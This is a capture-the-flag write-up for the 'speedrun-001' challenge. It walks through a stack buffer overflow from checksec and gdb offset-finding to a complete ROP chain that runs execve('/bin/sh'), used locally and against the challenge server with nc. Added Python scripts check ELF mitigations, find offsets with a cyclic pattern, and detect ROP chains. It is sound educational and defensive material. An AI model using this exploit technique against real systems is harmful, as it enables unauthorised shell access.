
1. The first thing to do is check the binary's memory protections:

```
xxx@ubuntu:~/OOOCTF$ checksec speedrun-001
[*] '/home/xxx/OOOCTF/speedrun-001'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```
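This output decides the rest of the writeup: NX enabled means bytes placed on the stack will never execute, so the author goes for ROP instead of shellcode; No PIE means every gadget sits at a fixed address; no canary means the return address can be overwritten without leaking anything first. As an added example (not part of the original writeup and not checksec's own code), the script below derives the same verdicts from the ELF64 program headers directly. It assumes only the ELF64 layout, uses a string search for `__stack_chk_fail` as its canary heuristic, and reports only No/Partial RELRO (Full RELRO would also need `DT_BIND_NOW` from the dynamic section, which it does not parse). The `make_test_elf` helper builds a constructed minimal ELF image so the check can be run offline.

```python
import struct

# ELF64 constants (from the ELF specification)
ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X = 1


def parse_elf64(data):
    """Return (e_type, [(p_type, p_flags), ...]) from a raw ELF64 image."""
    if data[:4] != b"\x7fELF" or data[4] != 2:  # EI_CLASS must be ELFCLASS64
        raise ValueError("not an ELF64 image")
    e_type, = struct.unpack_from("<H", data, 16)
    e_phoff, = struct.unpack_from("<Q", data, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    phdrs = []
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        phdrs.append((p_type, p_flags))
    return e_type, phdrs


def check_mitigations(data):
    """Reproduce the checksec verdicts from the program headers."""
    e_type, phdrs = parse_elf64(data)
    by_type = {p_type: p_flags for p_type, p_flags in phdrs}
    # Without a PT_GNU_STACK header the kernel gives the process an executable stack.
    nx = PT_GNU_STACK in by_type and not (by_type[PT_GNU_STACK] & PF_X)
    return {
        "nx": nx,
        "pie": e_type == ET_DYN,                 # ET_EXEC is loaded at a fixed address
        "relro": "Partial" if PT_GNU_RELRO in by_type else "No",
        "canary": b"__stack_chk_fail" in data,  # heuristic: the canary failure helper
    }


def describe(data):
    """Format the verdicts in checksec's style, e.g. 'NX: NX enabled'."""
    m = check_mitigations(data)
    return [
        "RELRO: %s RELRO" % m["relro"],
        "Stack: %s" % ("Canary found" if m["canary"] else "No canary found"),
        "NX: %s" % ("NX enabled" if m["nx"] else "NX disabled"),
        "PIE: %s" % ("PIE enabled" if m["pie"] else "No PIE"),
    ]


def make_test_elf(e_type, stack_flags, relro=True, canary=False):
    """Build a constructed minimal ELF64 image (header + program headers only)."""
    phdrs = [(PT_GNU_STACK, stack_flags)]
    if relro:
        phdrs.append((PT_GNU_RELRO, 4))  # PF_R
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH", e_type, 62, 1, 0x400000,
                               64, 0, 0, 64, 56, len(phdrs), 64, 0, 0)
    body = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0x10)
                    for t, f in phdrs)
    tail = b"__stack_chk_fail\x00" if canary else b""
    return ehdr + body + tail


if __name__ == "__main__":
    # A constructed image with the same profile as speedrun-001: NX, no PIE, no canary.
    for line in describe(make_test_elf(ET_EXEC, 6)):  # 6 = PF_R | PF_W
        print(line)
```

Stack flags of 6 (read/write) give "NX enabled"; 7 (read/write/execute) would give "NX disabled", which is what an `-z execstack` build or a missing PT_GNU_STACK header produces.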

2. Generate a large payload:

`xxx@ubuntu:~/OOOCTF$ python -c 'print "a"*10240' > test.txt`

3. Check the crash in a debugger (gdb):

```
xxx@ubuntu:~/OOOCTF$ gdb ./speedrun-001
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./speedrun-001...(no debugging symbols found)...done.
(gdb) r < test.txt
Starting program: /home/pan/OOOCTF/speedrun-001 < test.txt
Hello brave new challenger
Any last words?
This will be the last thing that you say: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa�����

Program received signal SIGSEGV, Segmentation fault.
0x0000000000400bad in ?? ()
(gdb) bt
#0 0x0000000000400bad in ?? ()
#1 0x6161616161616161 in ?? ()
#2 0x6161616161616161 in ?? ()
#3 0x6161616161616161 in ?? ()
#4 0x6161616161616161 in ?? ()
#5 0x6161616161616161 in ?? ()
#6 0x6161616161616161 in ?? ()
#7 0x6161616161616161 in ?? ()
#8 0x6161616161616161 in ?? ()
#9 0x6161616161616161 in ?? ()
#10 0x6161616161616161 in ?? ()
#11 0x6161616161616161 in ?? ()
#12 0x6161616161616161 in ?? ()
#13 0x6161616161616161 in ?? ()
#14 0x6161616161616161 in ?? ()
#15 0x6161616161616161 in ?? ()
#16 0x6161616161616161 in ?? ()
#17 0x6161616161616161 in ?? ()
#18 0x6161616161616161 in ?? ()
#19 0x6161616161616161 in ?? ()
#20 0x6161616161616161 in ?? ()
#21 0x6161616161616161 in ?? ()
#22 0x6161616161616161 in ?? ()
#23 0x6161616161616161 in ?? ()
#24 0x6161616161616161 in ?? ()
#25 0x6161616161616161 in ?? ()
---Type <return> to continue, or q <return> to quit---q
```

=> The return address has been overwritten (you can use the backtrace to see it; this is a special method I found), and you can see the possibility of a ROP chain.

4. Change the payload to locate the EIP (return address) position (blind approach; you can also use static analysis to work it out):

```
xxx@ubuntu:~/OOOCTF$ python -c 'print "a"*100+"b"*100+"c"*100+"d"*100+"e"*100+"f"*100+"g"*100+"h"*100+"i"*100+"j"*100+"k"*100' > test.txt
(gdb) bt
#0 0x0000000000400bad in ?? ()
#1 0x6b6b6b6b6b6b6b6b in ?? ()
#2 0x6b6b6b6b6b6b6b6b in ?? ()
#3 0x6b6b6b6b6b6b6b6b in ?? ()
#4 0x6b6b6b6b6b6b6b6b in ?? ()
#5 0x6b6b6b6b6b6b6b6b in ?? ()
#6 0x6b6b6b6b6b6b6b6b in ?? ()
#7 0x6b6b6b6b6b6b6b6b in ?? ()
#8 0x6b6b6b6b6b6b6b6b in ?? ()
#9 0x0000000a6b6b6b6b in ?? ()
#10 0x0000000000000000 in ?? ()

k is 0x6b => change the payload to "a"*1000+"b"*100 to confirm it

continue to test:
python -c 'print "a"*1000+"b"*50+"c"*50' > test.txt => #1 0x6262626262626262 in ?? ()
python -c 'print "a"*1000+"b"*20+"c"*20+"d"*20+"e"*20+"f"*20' > test.txt => #1 0x6363636363636363 in ?? ()
python -c 'print "a"*1025+"b"*10+"c"*10+"d"*10+"e"*10+"f"*10' > test.txt => #1 0x6363636363626262 in ?? ()
python -c 'print "a"*1025+"b"*7+"c"*8+"d"*8' > test.txt => #1 0x6363636363636363 in ?? () => c lands exactly on the return address

python -c 'from pwn import *; print "a"*1032+p64(0x1234567890abcdef)+p64(0xfedcba0987654321)+p64(0x1234567890abcdef)+p64(0xfedcba0987654321)'
(gdb) bt
#0 0x0000000000400bad in ?? ()
#1 0x1234567890abcdef in ?? ()
#2 0xfedcba0987654321 in ?? () # rop chain
#3 0x1234567890abcdef in ?? () # rop chain
#4 0xfedcba0987654321 in ?? () # rop chain
#5 0x000000000040110a in ?? () # rop chain
#6 0x0000000000400a5a in ?? ()
(gdb)
```
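Steps 3 and 4 find the return address by bisecting with blocks of repeated letters over several runs, and the straddling value `0x6363636363626262` shows why that needs more than one pass. As an added example (my code, not the author's; pwntools ships the same idea as `cyclic` and `cyclic_find`), the script below does it in a single run with a de Bruijn pattern, in which every 4-byte window is unique, so whatever lands in frame #1 maps straight back to an offset, aligned or not. The `simulate_crash` function is a constructed stand-in for the crashing program: it models a 1024-byte buffer followed by the saved rbp and then the return address, which is the layout the writeup's offset of 1032 implies; it is an assumption, not the challenge's real source. (The `0a` byte in frame #9 above, incidentally, is the newline `print` appends.)

```python
import functools
import string
import struct


@functools.lru_cache(maxsize=None)
def de_bruijn(alphabet=string.ascii_lowercase, n=4):
    """Generate the de Bruijn sequence B(k, n) over `alphabet`: every string of
    length n appears exactly once as a window of the (cyclic) sequence."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in out)


def cyclic(length, n=4):
    """First `length` bytes of the pattern (26**4 = 456976 bytes are available)."""
    return de_bruijn(n=n)[:length].encode()


def cyclic_find(value, n=4, pattern=None):
    """Map a register or return-address value from a crash back to its offset in
    the pattern. Only the low n bytes are used, so a full 8-byte value such as
    gdb's frame #1 address works. Returns -1 if the value did not come from the
    pattern (e.g. the program crashed for another reason)."""
    pattern = pattern if pattern is not None else cyclic(26 ** n, n)
    window = struct.pack("<Q", value)[:n]
    return pattern.find(window)


def simulate_crash(payload, buf_size=1024):
    """Constructed model of the vulnerable frame: buf_size bytes of buffer, then
    8 bytes of saved rbp, then the 8-byte return address. Returns the value that
    would end up as the return address (what gdb shows as frame #1), or None if
    the input is too short to reach it."""
    ret_off = buf_size + 8
    if len(payload) < ret_off + 8:
        return None
    return struct.unpack("<Q", payload[ret_off:ret_off + 8])[0]


def find_return_offset(pattern_length=2000, buf_size=1024):
    """One crash run with a cyclic pattern yields the overwrite offset."""
    payload = cyclic(pattern_length)
    crashed_with = simulate_crash(payload, buf_size)
    if crashed_with is None:
        return -1
    return cyclic_find(crashed_with)


if __name__ == "__main__":
    print("return address is at offset", find_return_offset())
```

With the modelled layout `find_return_offset()` returns 1032, the same number the writeup reaches after five runs; against a real target the value fed to `cyclic_find` is simply the address gdb prints in frame #1.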

5. Start finding gadgets:

```
example of bind shell

eax = 11
ebx = address of "/bin/sh"
ecx = 0
edx = 0
int 0x80

0x0000000000415664 : pop rax ; ret
0x0000000000400df8 : pop rbx ; ret
0x00000000004498b5 : pop rdx ; ret
0x0000000000488464 : mov qword ptr [rbx + 0x18], rax ; pop rbx ; ret
0x0000000000488538 : mov qword ptr [rbx + 0x20], rax ; pop rbx ; ret
0x000000000044f088 : xchg byte ptr [rax - 0x75], cl ; ret
0x000000000046817a : int 0x80
0x0000000000422e05 : lea rcx, [rdx - 8] ; cmovne rax, rcx ; ret

starting to build up:

; gadget for mov qword ptr [addr], data => *addr = (unsigned long long)data;
p64(0x415664)+p64(data)+p64(0x400df8)+p64(addr-0x18)+p64(0x488464)+"JUNKJUNK"

; *.bss = "/bin/sh";
p64(0x415664)+"/bin/sh\00"+p64(0x400df8)+p64(0x6BCA00-0x18)+p64(0x488464)+"JUNKJUNK"

; rax, rbx, rcx, rdx setting
p64(0x4498b5)+p64(dataRCX+8)+p64(0x422e05)+p64(0x415664)+p64(dataRAX)+p64(0x400df8)+p64(dataRBX)+p64(0x4498b5)+p64(dataRDX)

; execve("/bin/sh", 0, 0); => rax = 11, rbx = .bss, rcx = 0, rdx = 0 & int 0x80
p64(0x415664)+"/bin/sh\00"+p64(0x400df8)+p64(0x6BCA00-0x18)+p64(0x488464)+"JUNKJUNK"+
p64(0x4498b5)+p64(8)+p64(0x422e05)+p64(0x415664)+p64(11)+p64(0x400df8)+p64(0x6BCA00)+p64(0x4498b5)+p64(0)+
p64(0x46817a)

; pwned !!!

; local
(python -c 'from pwn import *;print "a"*1032+p64(0x415664)+"/bin/sh\00"+p64(0x400df8)+p64(0x6BCA00-0x18)+p64(0x488464)+"JUNKJUNK"+p64(0x4498b5)+p64(8)+p64(0x422e05)+p64(0x415664)+p64(11)+p64(0x400df8)+p64(0x6BCA00)+p64(0x4498b5)+p64(0)+p64(0x46817a)+"\n"'; cat -) | ./speedrun-001
Hello brave new challenger
Any last words?
This will be the last thing that you say: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadVA

echo hacked by k1nm3nh4ck3r
hacked by k1nm3nh4ck3r

; remote
(python -c 'from pwn import *;print "a"*1032+p64(0x415664)+"/bin/sh\00"+p64(0x400df8)+p64(0x6BCA00-0x18)+p64(0x488464)+"JUNKJUNK"+p64(0x4498b5)+p64(8)+p64(0x422e05)+p64(0x415664)+p64(11)+p64(0x400df8)+p64(0x6BCA00)+p64(0x4498b5)+p64(0)+p64(0x46817a)+"\n"'; cat -) | nc speedrun-001.quals2019.oooverflow.io 31337

=> run 'cat flag' to see the flag
```
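Everything in this chain works because the binary has No PIE: each gadget is a fixed address in the 0x400000 range, so the payload itself carries recognisable code pointers. As an added example (not from the writeup), the script below shows the defender's side of that property: it slides an 8-byte window over an input and flags little-endian words that fall inside the executable's text range, the way a crash-dump triage script might spot a ROP payload in captured input. The text range 0x400000..0x4A0000 is an assumption chosen to cover the gadget addresses quoted above (for a real binary it would come from the executable PT_LOAD segment), `SAMPLE_CHAIN` is a constructed input that reuses the writeup's first write-gadget sequence after the 1032-byte padding, and `BENIGN_INPUT` is an ordinary text line.

```python
import struct

# Assumed code range of the non-PIE binary: loaded at 0x400000 (as checksec
# reported) with an upper bound chosen to cover the gadget addresses quoted in
# the writeup. For a real binary take it from the PT_LOAD header with PF_X set.
TEXT_LO, TEXT_HI = 0x400000, 0x4A0000


def p64(value):
    """Little-endian 8-byte packing, the same as pwntools' p64()."""
    return struct.pack("<Q", value)


def code_pointers(data, lo=TEXT_LO, hi=TEXT_HI):
    """Slide an 8-byte window over `data` one byte at a time and return
    [(offset, value)] for every word that decodes to an address in [lo, hi).
    Sliding byte-wise finds the chain whatever the buffer alignment; misaligned
    windows decode to values far outside such a small range."""
    hits = []
    for off in range(len(data) - 7):
        value = struct.unpack_from("<Q", data, off)[0]
        if lo <= value < hi:
            hits.append((off, value))
    return hits


def looks_like_rop_chain(data, min_pointers=3, max_gap=64, lo=TEXT_LO, hi=TEXT_HI):
    """Heuristic verdict: several code pointers close together. A chain
    interleaves gadget addresses with popped values ("/bin/sh", JUNKJUNK, a
    .bss address), so consecutive pointers sit a few words apart, never far."""
    offsets = [off for off, _ in code_pointers(data, lo, hi)]
    if len(offsets) < min_pointers:
        return False
    return all(b - a <= max_gap for a, b in zip(offsets, offsets[1:]))


# Constructed samples: the writeup's first write-gadget sequence after the
# 1032-byte padding, and a harmless line of text.
SAMPLE_CHAIN = (b"a" * 1032 + p64(0x415664) + b"/bin/sh\x00" + p64(0x400df8)
                + p64(0x6BCA00 - 0x18) + p64(0x488464) + b"JUNKJUNK")
BENIGN_INPUT = b"Hello brave new challenger, any last words?\n"


def triage(data):
    """Summarise an input: the code pointers found (offset, hex) and the verdict."""
    hits = code_pointers(data)
    return {
        "pointers": [(off, hex(val)) for off, val in hits],
        "rop_chain": looks_like_rop_chain(data),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_CHAIN))
    print(triage(BENIGN_INPUT))
```

On `SAMPLE_CHAIN` the three gadget addresses show up at offsets 1032, 1048 and 1064 while the `.bss` address, the string and the filler do not, so the verdict is a chain; the benign line yields no pointers at all. A single stray pointer (for example a lone crash address) stays below `min_pointers` and is not flagged. This is deliberately a heuristic: it depends on the very thing that made the exploit easy, fixed addresses, which is why PIE is the mitigation the checksec output was missing.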

Reference:

1. https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/